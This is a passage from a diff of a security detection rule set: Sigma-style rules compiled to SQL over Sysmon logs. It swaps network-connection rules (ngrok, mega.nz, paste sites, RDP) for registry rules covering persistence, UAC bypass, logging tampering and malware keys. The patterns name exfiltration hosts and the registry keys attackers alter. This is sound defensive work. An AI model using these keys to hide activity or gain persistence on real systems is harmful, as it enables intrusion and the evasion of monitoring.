TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter 
in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. 
In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '3389' AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR Image LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR Image LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR Image LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR Image LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" + 
"SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "status": "experimental", + "description": "Detects potential persistence activity via outlook today pages. 
An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject 
LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of the registry to disable a system restore on the computer", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "status": "experimental", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": 
"919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Notepad Making Network Connection", - "id": 
"e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.010" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND 
TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 
'%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a 
system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' 
ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": 
"registry_set_persistence_lsa_extension.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "status": "test", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows 
